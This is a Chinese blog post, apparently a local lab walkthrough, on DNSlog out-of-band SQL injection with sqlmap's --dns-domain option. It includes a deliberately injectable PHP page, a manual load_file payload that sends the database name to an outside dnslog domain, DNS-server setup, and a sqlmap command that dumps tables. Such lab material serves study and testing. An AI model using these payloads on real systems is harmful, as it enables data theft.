sqlmap结合dnslog注入

最新推荐文章于 2023-03-18 20:50:11 发布
最新推荐文章于 2023-03-18 20:50:11 发布
阅读量2k 收藏 3
点赞数 1
分类专栏: 漏洞复现 环境搭建
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/106330783
版权

sqlmap结合dnslog注入

环境搭建

1.phpstudy

去官网下载安装

2.注入点

test.php

<?php
error_reporting(0);
$link = mysqli_connect('localhost','root','root');
mysqli_set_charset($link,'utf8');
mysqli_select_db($link,'seacms');
$id = $_GET['id'];
$sql = "select *from sea_admin where id =$id";
$res = mysqli_query($link,$sql);
?>

3.配置mysql

查看配置

show variables like '%secure%';

在这里插入图片描述
1、当secure_file_priv为空,就可以读取磁盘的目录。
2、当secure_file_priv为G:\,就可以读取G盘的文件。
3、当secure_file_priv为null,load_file就不能加载文件。
所以修改C:\phpstudy_pro\Extensions\MySQL8.0.12\my.ini
添加secure_file_priv=""
重启mysql

4.在线doslog网站

http://www.dnslog.cn/
https://dnslog.io/
这里使用http://www.dnslog.cn/演示

5.sqlmap结合dnslog

因为域名去年过期没有续费,现在买域名还需要实名认证要等几天,这里就本地进行复现
这里使用三台虚拟机,在公网是一样的效果
1.kali(使用sqlmap)ip 192.168.164.135
2.win2008r2(靶机)有注入点 ip 192.168.164.138
3.win2008r2 (dns服务器)ip 192.168.164.157
这里1,2的配置和上面一样,3需要设置dns服务器

安装dns服务器

在服务器配置角色中选择dns服务器
在这里插入图片描述
点击下一步,勾选dns服务器
在这里插入图片描述
连续下一步,之后点击安装,等待安装…
安装完成之后在开始管理工具中选择dns管理器
右键,属性
在这里插入图片描述
在监视中对测试类型打钩
在这里插入图片描述
在正常查找区域中右键选择新建区域
在这里插入图片描述
设置新建区域名称
在这里插入图片描述
继续默认下一步就可以
进入我们设置的域名,右键,新建主机(A记录)
在这里插入图片描述
设置域名,这里的ip地址为kali的ip
在这里插入图片描述
继续添加
在这里插入图片描述
因为这里是本地模拟,所以需要修改靶机的dns服务器为我们设置的dns服务器
在这里插入图片描述
在kali执行

tcpdump -n port 53

在靶机执行

ping test.hacker.top

在kali看到了数据包证明成功
在这里插入图片描述

添加转发(关键)

在条件转发器上右键添加条件转发器
在这里插入图片描述
ip是kali 的ip,之后点击确定
在靶机执行

ping test.hacker1.top

kali有显示即可
在这里插入图片描述

复现

手工注入

这里是本地复现,所以就直接进行注入,省略了一些基本操作

http://192.168.164.138/test.php?id=1%20union%20select%206,load_file(concat(%27\\\\%27,(select%20database()),%27.4ixgqh.dnslog.cn\\abc%27)),3,8,5,6,7,8

select%20database()是我们的注入语句
可以看到在dnslog平台已经有了回显
在这里插入图片描述

sqlmap的–dns-domain参数注入

在这里插入图片描述
接下来在kali使用sqlmap

sqlmap -u "http://192.168.164.138/test.php?id=1" --technique=T --dns-domain "hacker1.top" -D seacms --tables

速度非常快就会出现结果
在这里插入图片描述

参考文章

https://www.cnblogs.com/cwkiller/p/12794390.html
https://www.cnblogs.com/depycode/p/5954904.html
https://www.cnblogs.com/426-fly/p/11097063.html
https://blog.csdn.net/xiezuoyong/article/details/97272059

whojoe
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql执行系统命令函数_MySQL UDF提权执行系统命令
weixin_42305163的博客
01-19 1745
目录UDFUDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如user() 或 concat() 等。那么,我们该如何使用UDF呢?假设我的UDF文件名为 udf.dll,存放在MySQL安装目录的 lib/plugin 目录下。在 udf.dll 文件中,我定义了名为 sys_eval 的mys...
好用的dnslog在线平台
热门推荐
siu~
08-21 1万+
dnslog在线平台分享
SQLmap使用总结
Alexz__的博客
02-15 2918
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
sqlmap渗透进阶】DNS-domain注入
记录学习,一起进步
03-18 861
sqlmap渗透进阶】DNS-domain注入
Sqlmap参数详解
gao646467783的博客
11-21 744
sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小小191个参数,在这篇文章中,我将一一介绍,其实很多参数我也没有使用过,所以有一些...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
sqlmap注入漏洞测试
02-22
资源内容:sqlmap注入漏洞测试
sqlmap用于sql注入
10-27
用于sql注入的强大工具,需要python运行环境,我提交的资源列表里有。免python版我也提供啦,但是我自己跑的时候有点问题,所以还是强烈推荐这款,运行稳定,功能强大,而且是比较新的版本,欢迎下载,物超所值。
sqlmap sql 注入测试工具
最新发布
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
MySQL无法启动 不断反复重启 没有提示的解决方法
beyondcy的专栏
02-07 1529
不出问题一路next,出了问题才发现无从下手。居然没有记录错误的日志。听说删除data目录2个ib_logfile。我试了,又有新的错误。直接在MySQL安装目录下,运行:mysqld --console。打开,删除不存在的日志文件名(我直接清空了)这样可以看到启动信息与错误提示。多方查找与尝试,找到解决方案。原来是binlog.index。这个是我清理日志清掉了。可是还被谁惦记着呢?
sqlmap dolog外带数据
Miracle_ze的博客
08-05 461
首先要进行这次实验,我们电脑和虚拟机要带有sqlmap工具。Windows系统虚拟机在本次实验要使用mysql的读文件函数load_file,为此Load_file函数读mysql 的文件,但是要生效得 secure_file_priv不能是null才可以使用。 kali准备工作这里不写sqlmap更新。因为博主已经更新到目前最新的了因为前面已经说了这个只有读权限,为此要修改要去配置文件my.cnf 。 文件内添加内容: 查看是否修改了状态 成功启动并且版本为1.6.7服务器角色创建服务器为DNS
sqlmap结合dnslog快速注入
qq_52016943的博客
08-08 1127
sqlmap SQL注入
sqlmap使用_使用sqlmap结合dnslog快速注入
weixin_39962675的博客
12-09 430
0x01 起因实际项目中遇到一个oracle延时注入,需要获取数据,几十个库几百张表,等找到关键数据不知道要到哪天.测试支持带外请求于是想用使用sqlmap利用DNS进行OOB注入0x02 阿里云主机与DNS解析配置1.首先购买一个域名并且进行备案,然后还需要一台vps2.配置DNS解析创建DNS服务器ns1.cwkiller.top-->vps ip ns2.cwkiller.t...
sql注入-sqlmapDNSLOG的完美结合
weixin_54217950的博客
02-19 3105
sqlmap结合dnslog 实验环境: 这里使用三台虚拟机,在公网是一样的效果 1.kali(使用sqlmap) ip:192.168.31.40 2.windows10(靶机) ip: 192.168.31.33 3.windows 2008 R2 ( 需要设置dns服务器)ip :192.168.31.35 DNS服务器配置 dns服务器配置(ip为服务器所在主机的ip) dns转换器配置(ip为kail的ip) 设置靶机的dns地址 IP为配置的dns地址 在靶机pi
SQL注入之利用DNS获取数据
Au
03-13 3980
1.SQL注入 SQL注入一般分为报错注入和盲注,盲注的又分为布尔盲注和时间盲注。 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易搞挂网站,这时候我们就需要寻找一种快速有效的方法来获取数据。 此时我们就可以利用DNS来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用 特点:...
sqlmap_dns注入配置方法
KHOST的博客
07-17 712
网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下--dns-domain参数,相关的实战文章要么就写的模糊或者一笔带过,搞的云里雾里(主要是菜,关键还没大佬带)。然后自己参考网上的方法自己重新搞了一遍。 0X00 需要准备的东西,sqlmap、windows盲注一个、两个域名、一台外网服务器。 某次搞事情的时候碰到一个时间盲注,碰巧是台windows的,想起dns注入的方法。 在开始前我准备先用sqlmap的--sql-shell 命令进行dns注入payloa..
sqlmap --dns-domain模拟实践
weixin_33724659的博客
10-13 661
因为看到乌云的这一篇文章http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入,所以想本地模拟一个环境进行测试。 首先dns注入 mysql> show variables like '%skip%'; +------------------------+---...
php延时注入,sqlmapdns-domain 突破延时注入
weixin_36345268的博客
03-10 387
因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的–dns-domain 进行dns 注入,所以想本地模拟一个环境进行测试。首先dns注入>show variables like‘%skip%‘;+------------------------+-------+|Variable_n...
sqlmap堆叠注入
09-04
SQLMap是一款常用的自动化SQL注入工具,可以用于检测和利用Web应用程序中的SQL注入漏洞。堆叠注入是一种高级的SQL注入技术,它利用了多个SQL查询语句在同一次数据库连接中执行的特性。 堆叠注入的原理是将多个SQL查询语句通过分号(;)进行分隔,并在应用程序中通过相关的注入点将它们拼接在一起。这样,应用程序在执行SQL查询时会一次性执行所有的查询语句,从而可以执行更复杂的攻击操作。 要使用SQLMap进行堆叠注入,首先需要找到一个存在SQL注入漏洞的目标网站。通过使用SQLMap的命令参数和选项,可以指定注入点、数据库类型、注入技术等信息。然后,SQLMap会自动检测并利用漏洞,尝试获取敏感信息或执行攻击操作。 需要注意的是,使用SQLMap进行堆叠注入属于黑盒测试和授权范围内的安全研究活动,未经授权的测试可能违法并且对目标网站造成损害。在进行任何安全测试之前,请确保已获得合法的授权,并遵守相关法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值